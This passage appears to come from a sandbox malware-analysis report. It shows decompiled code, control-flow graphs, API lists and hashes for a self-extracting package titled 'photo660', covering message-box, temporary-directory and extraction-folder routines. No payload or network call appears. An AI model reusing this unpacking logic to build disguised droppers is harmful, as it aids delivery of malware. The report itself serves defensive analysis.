                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                        • API String ID: 1305606123-2642027498
                                                                                                                                                                                                        • Opcode ID: 2c01b5866eccea746b4c535ad42d30eeb632f63de83a61906adfd41c1d5c0b0c
                                                                                                                                                                                                        • Instruction ID: 1fb1de70226acbdcef7a2e140a5a8f35d253b540003982370583c5441087e4fc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c01b5866eccea746b4c535ad42d30eeb632f63de83a61906adfd41c1d5c0b0c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 463119B0651312BBD7206B61BDCEFE736DCAB7A754F008024B90DA2191CFB48CE08650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002144B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 406 2144b9-2144f8 407 214679-21467b 406->407 408 2144fe-214525 LoadStringA 406->408 411 21467c-21468c call 216ce0 407->411 409 214562-214568 408->409 410 214527-21452e call 21681f 408->410 412 21456b-214570 409->412 420 214530-21453d call 2167c9 410->420 421 21453f 410->421 412->412 416 214572-21457c 412->416 418 2145c9-2145cb 416->418 419 21457e-214580 416->419 424 214607-214617 LocalAlloc 418->424 425 2145cd-2145cf 418->425 422 214583-214588 419->422 420->421 426 214544-214554 MessageBoxA 420->426 421->426 422->422 429 21458a-21458c 422->429 427 21455a-21455d 424->427 428 21461d-214628 call 211680 424->428 431 2145d2-2145d7 425->431 426->427 427->411 435 21462d-21463d MessageBeep call 21681f 428->435 433 21458f-214594 429->433 431->431 434 2145d9-2145ed LocalAlloc 431->434 433->433 436 214596-2145ad LocalAlloc 433->436 434->427 437 2145f3-214605 call 21171e 434->437 444 21463f-21464c call 2167c9 435->444 445 21464e 435->445 436->427 440 2145af-2145c7 call 21171e 436->440 437->435 440->435 444->445 448 214653-214677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E002144B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x218004; // 0x58ac7c6d
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x218a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x219a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00211680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0021171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0021171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0021681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E002167C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "photo660", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0021681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E002167C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "photo660", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00216CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                        0x002144b9
                                                                                                                                                                                                        0x002144c4
                                                                                                                                                                                                        0x002144cb
                                                                                                                                                                                                        0x002144d8
                                                                                                                                                                                                        0x002144e4
                                                                                                                                                                                                        0x002144eb
                                                                                                                                                                                                        0x002144ee
                                                                                                                                                                                                        0x002144ef
                                                                                                                                                                                                        0x002144ef
                                                                                                                                                                                                        0x002144f1
                                                                                                                                                                                                        0x002144f7
                                                                                                                                                                                                        0x002144f8
                                                                                                                                                                                                        0x0021467b
                                                                                                                                                                                                        0x002144fe
                                                                                                                                                                                                        0x00214509
                                                                                                                                                                                                        0x00214518
                                                                                                                                                                                                        0x00214525
                                                                                                                                                                                                        0x00214562
                                                                                                                                                                                                        0x00214568
                                                                                                                                                                                                        0x00214568
                                                                                                                                                                                                        0x0021456b
                                                                                                                                                                                                        0x0021456b
                                                                                                                                                                                                        0x0021456d
                                                                                                                                                                                                        0x0021456e
                                                                                                                                                                                                        0x00214572
                                                                                                                                                                                                        0x00214578
                                                                                                                                                                                                        0x0021457c
                                                                                                                                                                                                        0x002145cb
                                                                                                                                                                                                        0x00214607
                                                                                                                                                                                                        0x00214607
                                                                                                                                                                                                        0x0021460d
                                                                                                                                                                                                        0x00214613
                                                                                                                                                                                                        0x00214617
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021461d
                                                                                                                                                                                                        0x00214623
                                                                                                                                                                                                        0x00214626
                                                                                                                                                                                                        0x00214628
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214628
                                                                                                                                                                                                        0x002145cd
                                                                                                                                                                                                        0x002145cd
                                                                                                                                                                                                        0x002145cf
                                                                                                                                                                                                        0x002145cf
                                                                                                                                                                                                        0x002145d2
                                                                                                                                                                                                        0x002145d2
                                                                                                                                                                                                        0x002145d4
                                                                                                                                                                                                        0x002145d5
                                                                                                                                                                                                        0x002145db
                                                                                                                                                                                                        0x002145de
                                                                                                                                                                                                        0x002145e3
                                                                                                                                                                                                        0x002145e9
                                                                                                                                                                                                        0x002145ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002145f3
                                                                                                                                                                                                        0x002145fd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214602
                                                                                                                                                                                                        0x002145ed
                                                                                                                                                                                                        0x0021457e
                                                                                                                                                                                                        0x0021457e
                                                                                                                                                                                                        0x00214580
                                                                                                                                                                                                        0x00214580
                                                                                                                                                                                                        0x00214583
                                                                                                                                                                                                        0x00214583
                                                                                                                                                                                                        0x00214585
                                                                                                                                                                                                        0x00214586
                                                                                                                                                                                                        0x0021458a
                                                                                                                                                                                                        0x0021458c
                                                                                                                                                                                                        0x0021458f
                                                                                                                                                                                                        0x0021458f
                                                                                                                                                                                                        0x00214591
                                                                                                                                                                                                        0x00214592
                                                                                                                                                                                                        0x0021459b
                                                                                                                                                                                                        0x0021459e
                                                                                                                                                                                                        0x002145a3
                                                                                                                                                                                                        0x002145a9
                                                                                                                                                                                                        0x002145ad
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002145af
                                                                                                                                                                                                        0x002145af
                                                                                                                                                                                                        0x002145bf
                                                                                                                                                                                                        0x0021462d
                                                                                                                                                                                                        0x00214630
                                                                                                                                                                                                        0x0021463d
                                                                                                                                                                                                        0x0021464e
                                                                                                                                                                                                        0x0021464e
                                                                                                                                                                                                        0x0021463f
                                                                                                                                                                                                        0x00214640
                                                                                                                                                                                                        0x00214647
                                                                                                                                                                                                        0x0021464c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021464c
                                                                                                                                                                                                        0x00214666
                                                                                                                                                                                                        0x0021466d
                                                                                                                                                                                                        0x0021466f
                                                                                                                                                                                                        0x00214675
                                                                                                                                                                                                        0x00214675
                                                                                                                                                                                                        0x002145ad
                                                                                                                                                                                                        0x00214527
                                                                                                                                                                                                        0x0021452e
                                                                                                                                                                                                        0x0021453f
                                                                                                                                                                                                        0x0021453f
                                                                                                                                                                                                        0x00214530
                                                                                                                                                                                                        0x00214531
                                                                                                                                                                                                        0x00214538
                                                                                                                                                                                                        0x0021453d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021453d
                                                                                                                                                                                                        0x00214554
                                                                                                                                                                                                        0x0021455a
                                                                                                                                                                                                        0x0021455a
                                                                                                                                                                                                        0x0021455a
                                                                                                                                                                                                        0x00214525
                                                                                                                                                                                                        0x0021468c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                        • MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 002145A3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000065), ref: 002145E3
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 0021460D
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00214630
                                                                                                                                                                                                        • MessageBoxA.USER32(?,00000000,photo660,00000000), ref: 00214666
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 0021466F
                                                                                                                                                                                                          • Part of subcall function 0021681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0021686E
                                                                                                                                                                                                          • Part of subcall function 0021681F: GetSystemMetrics.USER32(0000004A), ref: 002168A7
                                                                                                                                                                                                          • Part of subcall function 0021681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 002168CC
                                                                                                                                                                                                          • Part of subcall function 0021681F: RegQueryValueExA.ADVAPI32(?,00211140,00000000,?,?,0000000C), ref: 002168F4
                                                                                                                                                                                                          • Part of subcall function 0021681F: RegCloseKey.ADVAPI32(?), ref: 00216902
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                        • String ID: LoadString() Error. Could not load string resource.$photo660
                                                                                                                                                                                                        • API String ID: 3244514340-1652614573
                                                                                                                                                                                                        • Opcode ID: fb2715635dfd91dcf57ee255b8d5fd3ffa72c9ee15a0b029c5c12dca596125fd
                                                                                                                                                                                                        • Instruction ID: 2aac61020d8b47d141f2a4b5808637fe0b50128d5664242a0135f71d91124b06
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb2715635dfd91dcf57ee255b8d5fd3ffa72c9ee15a0b029c5c12dca596125fd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1851147191021AABDB21AF289C48BEA7BE9EF65304F004194FD0DA7241DB319EA5CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002153A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E002153A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x218004; // 0x58ac7c6d
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0021171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00211680(_t32, 0x104, _t20);
					E0021658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00216CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x218a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                        0x002153ac
                                                                                                                                                                                                        0x002153b3
                                                                                                                                                                                                        0x002153b9
                                                                                                                                                                                                        0x002153bb
                                                                                                                                                                                                        0x002153bd
                                                                                                                                                                                                        0x002153bf
                                                                                                                                                                                                        0x002153d1
                                                                                                                                                                                                        0x002153d6
                                                                                                                                                                                                        0x002153e0
                                                                                                                                                                                                        0x002153e2
                                                                                                                                                                                                        0x002153f5
                                                                                                                                                                                                        0x002153fb
                                                                                                                                                                                                        0x00215402
                                                                                                                                                                                                        0x0021540b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215413
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215415
                                                                                                                                                                                                        0x00215416
                                                                                                                                                                                                        0x00215427
                                                                                                                                                                                                        0x0021542a
                                                                                                                                                                                                        0x0021542b
                                                                                                                                                                                                        0x00215434
                                                                                                                                                                                                        0x00215434
                                                                                                                                                                                                        0x0021543a
                                                                                                                                                                                                        0x0021544c
                                                                                                                                                                                                        0x0021544c
                                                                                                                                                                                                        0x00215452
                                                                                                                                                                                                        0x0021545a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021545e
                                                                                                                                                                                                        0x0021545f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021171E: _vsnprintf.MSVCRT ref: 00211750
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 002153FB
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215402
                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021541F
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021542B
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215434
                                                                                                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215452
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                        • API String ID: 1082909758-4044985724
                                                                                                                                                                                                        • Opcode ID: 4cbe196dd5802cdb9a00131d7f61ac9abf2a5d25e612cd8856800ef8d5c3a93b
                                                                                                                                                                                                        • Instruction ID: dcc11fe3ce8c23d87c4a7f29d380b462e93cdf4889235ca1874e5908f4f25400
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cbe196dd5802cdb9a00131d7f61ac9abf2a5d25e612cd8856800ef8d5c3a93b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51113471711524A7D3209F22AC4CFEF36ADEFF6321F004065F656D2190CE7489E28AA2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00215467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 522 215467-215484 523 21548a-215490 call 2153a1 522->523 524 21551c-215528 call 211680 522->524 528 215495-215497 523->528 527 21552d-215539 call 2158c8 524->527 537 21553b-215545 CreateDirectoryA 527->537 538 21554d-215552 527->538 530 215581-215583 528->530 531 21549d-2154c0 call 211781 528->531 532 21558d-21559d call 216ce0 530->532 539 2154c2-2154d8 GetSystemInfo 531->539 540 21550c-21551a call 21658a 531->540 542 215577-21557c call 216285 537->542 543 215547 537->543 544 215585-21558b 538->544 545 215554-215557 call 21597d 538->545 546 2154da-2154dd 539->546 547 2154fe 539->547 540->527 542->530 543->538 544->532 553 21555c-21555e 545->553 551 2154f7-2154fc 546->551 552 2154df-2154e2 546->552 554 215503-215507 call 21658a 547->554 551->554 557 2154f0-2154f5 552->557 558 2154e4-2154e7 552->558 553->544 559 215560-215566 553->559 554->540 557->554 558->540 561 2154e9-2154ee 558->561 559->530 562 215568-215575 RemoveDirectoryA 559->562 561->554 562->530
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00215467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x218004; // 0x58ac7c6d
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x2191e4;
					_t42 = 0x104;
					E00211680(0x2191e4, 0x104);
					L14:
					_t13 = E002158C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x219124 = 0;
							_t14 = 1;
							L24:
							return E00216CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0021597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x218a20; // 0x0
						if(_t61 != 0) {
							 *0x218a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x219124 = E00216285();
						goto L22;
					}
					 *0x218a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E002153A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x2191e4;
				E00211781(0x2191e4, 0x104, __ecx,  &_v268);
				if(( *0x219a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0021658A(_t48, 0x104, 0x211140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0021658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                        0x00215472
                                                                                                                                                                                                        0x00215479
                                                                                                                                                                                                        0x00215481
                                                                                                                                                                                                        0x00215484
                                                                                                                                                                                                        0x0021551c
                                                                                                                                                                                                        0x00215521
                                                                                                                                                                                                        0x00215528
                                                                                                                                                                                                        0x0021552d
                                                                                                                                                                                                        0x0021552f
                                                                                                                                                                                                        0x00215539
                                                                                                                                                                                                        0x0021554d
                                                                                                                                                                                                        0x0021554d
                                                                                                                                                                                                        0x00215552
                                                                                                                                                                                                        0x00215585
                                                                                                                                                                                                        0x00215585
                                                                                                                                                                                                        0x0021558b
                                                                                                                                                                                                        0x0021558d
                                                                                                                                                                                                        0x0021559d
                                                                                                                                                                                                        0x0021559d
                                                                                                                                                                                                        0x00215557
                                                                                                                                                                                                        0x0021555e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215560
                                                                                                                                                                                                        0x00215566
                                                                                                                                                                                                        0x00215569
                                                                                                                                                                                                        0x0021556f
                                                                                                                                                                                                        0x0021556f
                                                                                                                                                                                                        0x00215581
                                                                                                                                                                                                        0x00215581
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215581
                                                                                                                                                                                                        0x00215545
                                                                                                                                                                                                        0x0021557c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021557c
                                                                                                                                                                                                        0x00215547
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215547
                                                                                                                                                                                                        0x0021548a
                                                                                                                                                                                                        0x00215490
                                                                                                                                                                                                        0x00215497
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021549d
                                                                                                                                                                                                        0x002154ab
                                                                                                                                                                                                        0x002154b4
                                                                                                                                                                                                        0x002154c0
                                                                                                                                                                                                        0x0021550c
                                                                                                                                                                                                        0x00215511
                                                                                                                                                                                                        0x00215515
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215515
                                                                                                                                                                                                        0x002154c9
                                                                                                                                                                                                        0x002154d6
                                                                                                                                                                                                        0x002154d8
                                                                                                                                                                                                        0x002154fe
                                                                                                                                                                                                        0x00215503
                                                                                                                                                                                                        0x00215507
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215507
                                                                                                                                                                                                        0x002154da
                                                                                                                                                                                                        0x002154dd
                                                                                                                                                                                                        0x002154f7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002154f7
                                                                                                                                                                                                        0x002154df
                                                                                                                                                                                                        0x002154e2
                                                                                                                                                                                                        0x002154f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002154f0
                                                                                                                                                                                                        0x002154e7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002154e9
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 002154C9
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021553D
                                                                                                                                                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021556F
                                                                                                                                                                                                          • Part of subcall function 002153A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 002153FB
                                                                                                                                                                                                          • Part of subcall function 002153A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215402
                                                                                                                                                                                                          • Part of subcall function 002153A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021541F
                                                                                                                                                                                                          • Part of subcall function 002153A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021542B
                                                                                                                                                                                                          • Part of subcall function 002153A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215434
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
